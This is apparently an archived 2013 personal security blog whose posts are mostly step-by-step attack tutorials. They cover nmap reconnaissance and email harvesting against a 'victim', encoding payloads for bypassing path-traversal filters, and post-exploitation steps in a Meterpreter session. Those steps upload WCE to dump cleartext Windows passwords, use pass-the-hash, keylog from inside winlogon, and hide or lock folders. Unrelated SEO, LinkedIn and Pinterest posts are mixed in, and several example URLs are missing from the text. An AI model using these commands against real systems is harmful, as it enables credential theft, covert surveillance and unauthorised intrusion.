Thursday, February 28, 2013

Use NMAP as a Information gathering tool

Usually we use NMAP as a port scanner to find open port of web-server, But with help of this Tool we can also gather Information about victim using NMAP script. In this tutorial we use NMAP to gather information.

(1) Use NMAP to determine I.P. Address of victim:- NMAP include two scripts in his database.
nmap --script ip-geolocation-* host-name

As we can see that it show co-ordinate & location of our target.

(2)Use NMAP as Whois Tool:- Following Command is used to find whois information about victim
nmap --script whois host-name

(3)Use NMAP for Email Harvesting:- There are two script for email harvesting.

  • Http-google-email
  • http-email-harvesting

Http-email-harvesting is official repository in nmap . But if you want to use Google webs & Google Group to find Email then you should Download Http-google-email from here.

Use Following command to find email Address
nmap -p80 --script http-email-harvest host-name

(4)Use NMAP as Brute Force DNS:- DNS recor contain useful information about website. There are many tools available for this purpose , But you can also use nmap for simple DNS Brute Force Attack.

Use Following command
nmap -p80 --script dns-brute host-name


(5)Discovering Additional Host-name:- we can find additional host which has same I.p. Address using simple nmap script. It can help us to find web-application which hosted on same I.p. Address.
Download this nse script from here.

You can aslo use following script code
nmap --script http-robtex-reverse-ip --script-args'ip'

Tuesday, February 26, 2013

How to Bypassing Filter to Traversal Attacks ?

Bypassing Filter to Traversal Attacks

If your initial attempts to perform a traversal attack, as described previously, are unsuccessful, this does not mean that the application is not vulnerable. Many application developers are aware of path traversal vulnerabilities and implement various kinds of input validation checks in an attempt to prevent them. However, those defenses are often flawed and can be bypassed by a skilled attacker.

The first type of input filter commonly encountered involves checking

whether the filename parameter contains any path traversal sequences, and if so, either rejects the request or attempts to sanitize the input to remove the sequences. This type of filter is often vulnerable to various attacks that use alternative encodings and other tricks to defeat the filter. These attacks all exploit the type of canonicalization problems faced by input validation mechanisms

Always try path traversal sequences using both forward slashes and

backslashes. Many input filters check for only one of these, when the file system may support both.

Try simple URL-encoded representations of traversal sequences, using

the following encodings. Be sure to encode every single slash and dot

within your input:

dot                            %2e

forward slash           %2f

backslash                  %5c

Try using 16-bit Unicode–encoding:

dot                           %u002e

forward slash          %u2215

backslash                %u2216

Try double URL–encoding:

dot                        %252e

forward slash         %252f

backslash                %255c

Try overlong UTF-8 Unicode–encoding:

dot                        %c0%2e       %e0%40%ae    %c0ae etc.

forward slash        %c0%af       %e0%80%af      %c0%2f etc.

backslash              %c0%5c       %c0%80%5c      etc.

You can use the illegal Unicode payload type within Burp Intruder to generate a huge number of alternate representations of any given character, and submit this at the relevant place within your target parameter. These are representations that strictly violate the rules for Unicode representation but are nevertheless accepted by many implementations of Unicode decoders, particularly on the Windows platform.

If the application is attempting to sanitize user input by removing traversal sequences, and does not apply this filter recursively, then it may be possible to bypass the filter by placing one sequence within another. For example:





The second type of input filter commonly encountered in defenses against path traversal attacks involves verifying whether the user-supplied filename contains a suffix (i.e., file type) or prefix (i.e., starting directory) that the application is expecting.

Some applications check whether the user-supplied file name ends in a

particular file type or set of file types, and reject attempts to access anything else. Sometimes this check can be subverted by placing a URL encoded null byte at the end of your requested filename, followed by a file type that the application accepts.

For example:


The reason this attack sometimes succeeds is that the file type check

is implemented using an API in a managed execution environment

in which strings are permitted to contain null characters (such as

String.endsWith() in Java). However, when the file is actually retrieved, the application ultimately uses an API in an unmanaged environment in which strings are null-terminated and so your file name is effectively truncated to your desired value.

A different attack against file type filtering is to use a URL-encoded newline character. Some methods of file retrieval (usually on Unix-based platforms) may effectively truncate your file name when a newline is encountered:


Some applications attempt to control the file type being accessed by

appending their own file type suffix to the filename supplied by the user. In this situation, either of the preceding exploits may be effective, for the same reasons.

Some applications check whether the user-supplied file name starts with a particular subdirectory of the start directory, or even a specific file name. This check can of course be trivially bypassed as follows:


If none of the preceding attacks against input filters are successful individually, it may be that the application is implementing multiple types of filters, and so you need to combine several of these attacks simultaneously (both against traversal sequence filters and file type or directory filters). If possible, the best approach here is to try to break the problem down into separate stages. For example, if the request for


is successful, but the request for


fails, then try all of the possible traversal sequence bypasses until a variation on the second request is successful. If these successful traversal sequence bypasses don’t enable you to access /etc/passwd, probe whether any file type filtering is implemented and can be bypassed, by requesting


Working entirely within the start directory defined by the application, try to probe to understand all of the filters being implemented, and see whether each can be bypassed individually with the techniques described.

Of course, if you have white box access to the application, then your task is much easier, because you can systematically work through different types of input and verify conclusively what filename (if any) is actually reaching the file system.

Saturday, February 23, 2013

Path traversal vulnerabilities Tutorial

Path traversal vulnerabilities arise when user-controllable data is used by the application to access files and directories on the application server or other back-end file system in an unsafe way. By submitting crafted input, an attacker Exploiting Path Traversal may be able to cause arbitrary content to be read from, or written to, anywhere on the file system being accessed. This often enables an attacker to read sensitive information from the server, or overwrite sensitive files, leading ultimately to arbitrary command execution on the server.

Consider the following example, in which an application uses a dynamic page to return static images to the client. The name of the requested image is specified in a query string parameter:

When the server processes this request, it performs the following steps:

1. Extracts the value of the file parameter from the query string.

2. Appends this value to the prefix C:\wahh-app\images\.

3. Opens the file with this name.

4. Reads the file’s contents and returns it to the client.

The vulnerability arises because an attacker can place path traversal

sequences into the file name in order to backtrack up from the image directory specified in step 2 and so access files from anywhere on the server. The path traversal sequence is known as “dot-dot-slash,” and a typical attack would look like this:\..\windows\repair\sam

When the application appends the value of the file parameter to the name of the images directory, it obtains the following path:


The two traversal sequences effectively step back up from the images directory to the root of the C: drive, and so the preceding path is equivalent to this: C:\winnt\repair\sam

Hence, instead of returning an image file, the server actually returns the repair copy of the Windows SAM file. This file may be analyzed by the attacker to obtain usernames and passwords for the server operating system.

In this simple example, the application implements no defenses to prevent path traversal attacks. However, because these attacks have been widely known about for some time, it is common to encounter applications that implement various defenses against them, often based on input validation filters. As you will see, these filters are often poorly designed and can be bypassed by a skilled attacker.

Wednesday, February 13, 2013

How to introduce SEO friendly content

Your site’s content not only has to be informative and interesting, but it also has to be created in such a manner that search engines notice it. You require lot of skills to create SEO-friendly content. The text of your web page serves as the main data that search engine crawlers use to categorize the web. The more interesting and informative is your blog content, the more people will read and refer it to their friends and followers. Here are the tips on how to create SEO-friendly content.

Keep your content simple
While you are creating content with SEO in mind, it’s equally important to keep the content simple so that it is easy to read and understand for an average internet user. Don’t try to confuse casual readers with technical jargon and complex techniques.
Give out good links
Search engines often scan your content for the links to other industry association websites. A good and reliable content should include proper attribution and links. Give out good links to authoritative sites like Include the reliable sources from which you have retrieved the data. Also, make sure to give credit to the original authors. All these, help you to earn back links.
Discover the hot topics
You can take the help of social media and social media monitoring tools to discover the trends. Google Alerts, Twitter, Google Trends and Technorati are some of the best sites that provide your company with the necessary resources to discover the trends. You can incorporate these trends into your content. Search for the topics on the web that have not been written about. Use such topics to create content and present it in a simple and understandable manner so that people will like to share.
Make sure your content is error-free
Creating a good content is not just about an interesting topic; it’s about error-free writing. Before posting your content makes sure to check your content for spelling and grammatical errors. Get it revised and checked thoroughly by a couple of authorized persons.
Use Inverted pyramid style of writing
Break up your content. It’s always a good idea to organize the content on your page. Instead of presenting a long one page text that is boring, break up that text into short paragraphs. Each paragraph should have its own headings and subheading. The first part of the paragraph should be an introductory paragraph and contain rich information. This is followed by the main theme of the story and conclusion at the end. This style of writing is called as “inverted pyramid” style. This makes it easy for search crawlers and readers to grab the information they want on your page.
Keyword placement
Keywords are the important terms that readers use in the search engines to find something. You can take help of Google tools or other free tools to work out what your main keywords are, how popular they are and how many competitive websites are using the terms as keywords? Once you have worked out with them, use keywords in your title, in the beginning of the first and last paragraphs of your content.
Use related keywords
Also, make sure the keywords used are related to your content. For instance, your main keyword is about “different types of parenting” it expects to see words about strict parenting, authoritative parenting, authoritive parenting and so on. “Google External Keyword tool” or “Google Suggest” provide you with other keywords that readers use, to make you write better content. If your keywords are not related to your content, search engines won’t display that page as part of the related search results.
Avoid keyword stuffing
Keyword density is determined by dividing the number of times the keyword used in the content by the word length of your content. For instance, if your keyword appears 10 times in a 1000 word article then your keyword density is 10/1000 = 1%. Your keyword density should be in the range 1% to 2%. If your keywords cross this range then SEO search engine bots identify them and harm your rankings or sometimes lead to a blacklist. Hence, you need to use them wisely.
Enhance your content with images and videos
Enhance your content management with SEO optimized images, videos and illustrations. This can as well drive traffic from Google images and to your website.
Length matters
The major search engines expect your content to be more than 300 words per page. Google prefers 950 words per page to display them in top ten search results while for Yahoo the average number of words is about 1,300.
Follow these tips and create SEO-friendly content which brings traffic to your website.
About The Author: Brianne is a writer. She loves writing, traveling and playing games. She contributes for

Tuesday, February 12, 2013

LinkedIn reached a new milestone: 200 million members | I am one of the top 5% most viewed LinkedIn profiles for 2012

LinkedIn reached a new milestone: 200 million members

Amarjit, congratulations! You have one of the top 5% most viewed LinkedIn profiles for 2012!

Friday, February 8, 2013

How to get windows passwords in plain text?

Windows Credentials Editor (WCE) is a security tool that allows to list Windows logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes, Kerberos tickets and cleartext passwords).

The tool allows users to:
  • Perform Pass-the-Hash on Windows
  • 'Steal' NTLM credentials from memory (with and without code injection)
  • 'Steal' Kerberos Tickets from Windows machines
  • Use the 'stolen' kerberos Tickets on other Windows or Unix machines to gain access to systems and services
  • Dump cleartext passwords stored by Windows authentication packages
WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing.
After hack remote computer upload wce to victim computer using metasploit
(1)Type following command in meterpreter session.
Upload /pentest/passwords/wce/wce.exe .
(2)Now type shellto get cmd of victim pc
(3)Type wce.exe -wto get password in clear text

List NTLM credentials in memory?

By default, WCE lists NTLM credentials in memory, no need to specify any options.
For example:

How to Change my current NTLM credentials?

wce.exe -s <username>:<domain>:<lmhash>:<nthash>
For example:
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
Changing NTLM credentials of current logon session (00024E1Bh) to:
Username: testuser
domain: amplialabs
LMHash: 01FC5A6BE7BC6929AAD3B435B51404EE
NTHash: 0CB6948805F797BF2A82807973B89537
NTLM credentials successfully changed!

How to Create a new logon session and launch a program with new NTLM credentials?

wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c <program>
For example:
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 -c cmd.exe

How to generate NTLM hashes with WCE? 

wce.exe -g <cleartext password>
For example:
C:\Users\test>wce.exe -g mypassword
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (
Use -h for help.
Password: mypassword
Hashes: 74AC99CA40DED420DC1A73E6CEA67EC5:A991AE45AA987A1A48C8BDC1209FF0E7 

If you want to know more about how its work , Download P.D.F. file from Below.
(1)P.D.F -1

If you only need clear text password not logon sessions and any other
you can use mimikatz to get clear text password.

Monday, February 4, 2013

Pentbox installation & use:-

PenTBox is a Security Suite that packs security and stability testing oriented tools for networks and systems.Programmed in Ruby and oriented to GNU/Linux systems, but compatible with Windows, MacOS and every systems where Ruby works.

Main Features:-
- Cryptography tools
  • Base64 Encoder & Decoder
  • Multi-Digest (MD5, SHA1, SHA256, SHA384, SHA512, RIPEMD-160)
  • Hash Password Cracker (MD5, SHA1, SHA256, SHA384, SHA512, RIPEMD-160)
  • Secure Password Generator

- Network tools
  • Net DoS Tester
  • TCP port scanner
  • Honeypot
  • Fuzzer
  • DNS and host gathering
  • MAC address geolocation (

- Web
  • HTTP directory bruteforce
  • HTTP common files bruteforce

How to install pentbox?

As mention earlier this framework is compatible in any system where ruby works.
So you have to install ruby in your system to use this tool.

svn co pentbox

cd pentbox

svn update



Cryptography tool:-
web application penetration tests we often discover encoded Base64 strings. Such strings can contain important information that’s why we need to have a decoder in our tool repository.

If in some situation we obtain password in hash form , then pentbox has inbuilt module that can crack hash into plain text , it can also encrypt plain text in hash form. Supported hash are MD5, SHA1, SHA256, SHA384, SHA512, RIPEMD-160.


Network tools:-
Available modules are Net DoS Tester TCP port scanner ,Honeypot,Fuzzer,DNS and host gathering,MAC address geolocation . For tcp port scan you should use NMAP , because it `s best tool for port scanning.
I like DNS and host gathering modules. It `s very fast & responsive.


Web tools:-
This section contain two tools for information gathering.
HTTP directory brute-force (You can find directory of website)
HTTP common files brute-force .

Sunday, February 3, 2013

Metasploit Post Exploitation Methods

(A)Hide File in victim `s P.C:-

After successfully got meterpreter sessions you can hide any file in victim `s P.C. Type following attribute.

attrib +h +r +s drivename:/Foldername

For example you want to hide folder name “songs” in F drive then just type following command in your terminal.


attrib +h +r +s F:/songs

For unhidden file attrib -h -r -s F:/songs

(B)Get passwords of remote windows P.C:-

After getting meterpreter session type ps command it will display list of running process. Now we should migrate meterpreter session to any running process with their process i.d.

In this example we will migrate meterpreter session to winlogon.exe which process i.d. Is 600.

Type following command in your terminal.

migrate 600

Keyscan_start – to start the keylogger

Keyscan_dump – to print captured keystrokes

Keyscan_stop – to stop the keylogger

(C)Remote Windows password in plain text :-

Type following command in your meterpreter session.

Upload /pentest/passwords/wce/wce.exe


wce.exe -w

(D)Lock Folder in Remote P.C. :-

After getting meterpreter  session type following command.

Cacls (Folder Name) /e /p everyone:n

This will lock your folder.

For unlock

Cacls (Folder Name) /e /p everyone:f

Here is more method of post exploitation.

Saturday, February 2, 2013

A Brief Introduction To Pinterest | By Chintan Gurjar

What is pinterest?
-> It is same like your stitch board. This is virtual stitch board. It allows to organize and share beautiful things. That we find on internet. People can create their own pinboards in which they plan their weddings, decorate their homes and organize their favourite recipes. Also much more can be done with the help of pinterest.
-> we can surf pinboards created by different peoples.
It gives fun with information and knowledge.

Why we should be on pinterest?
-> Estimated unique visitors of pinterest is increased by 429% from september to december 2011. It has quickly became the most popular media. It has also left behind google+ in just 4 month.

Mission Of Pinterest
-> The goal of pinterest is connecting the world through the "things", which they find interesting.
Pretty obvious goal.

Video Tutorial

Tips To Use Pinterest

  • Promote your lifestyle.
  • Be Nice.
  • Credit the source.
  • Avoid self promotion.
  • Inspire your team
  • Run Contests.
  • Report Objectionable Content
  • Feedback.

Friday, February 1, 2013

How to install & use Recon-ng?

Recon-ng is a true framework whose interface is modeled after the very popular and powerful Metasploit Framework. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.

Recon-ng is not intended to compete with any existing framework, as it was designed exclusively for web-based reconnaissance. recon-ng which can perform web-based reconnaissance and it can be used in social engineering engagements or for extracting information that exists on the web.

How to install Recon-ng ?
cd recon-ng

Discovering Contact with help of Recon-ng?
type help in the framework in order to see a list with all the available commands.


We can see that there is a command named modules.We will type that command to check the existing modules that we can use.In the next image you can see a sample of the available modules.

Here is a module called contacts_jigsaw. Jigsaw is a website similar to Linkedin that contains a large database of business contacts. So let’s say that we want to discover the contacts of a company that exists on jigsaw. We will load the module with the command load contacts_jigsaw and we will set the domain of our preference.
Discover additional Domain of same company?
we can try to use the Google module to discover additional domains of the same company. In this example I am using netcraft modules.


Recon-ng gives us also the ability to extract the results in CSV format or in an HTML file.

This tool is really simple to use and it holds every result in its database for later use.The report that generates is well formatted and if in the future additional modules will added on the framework.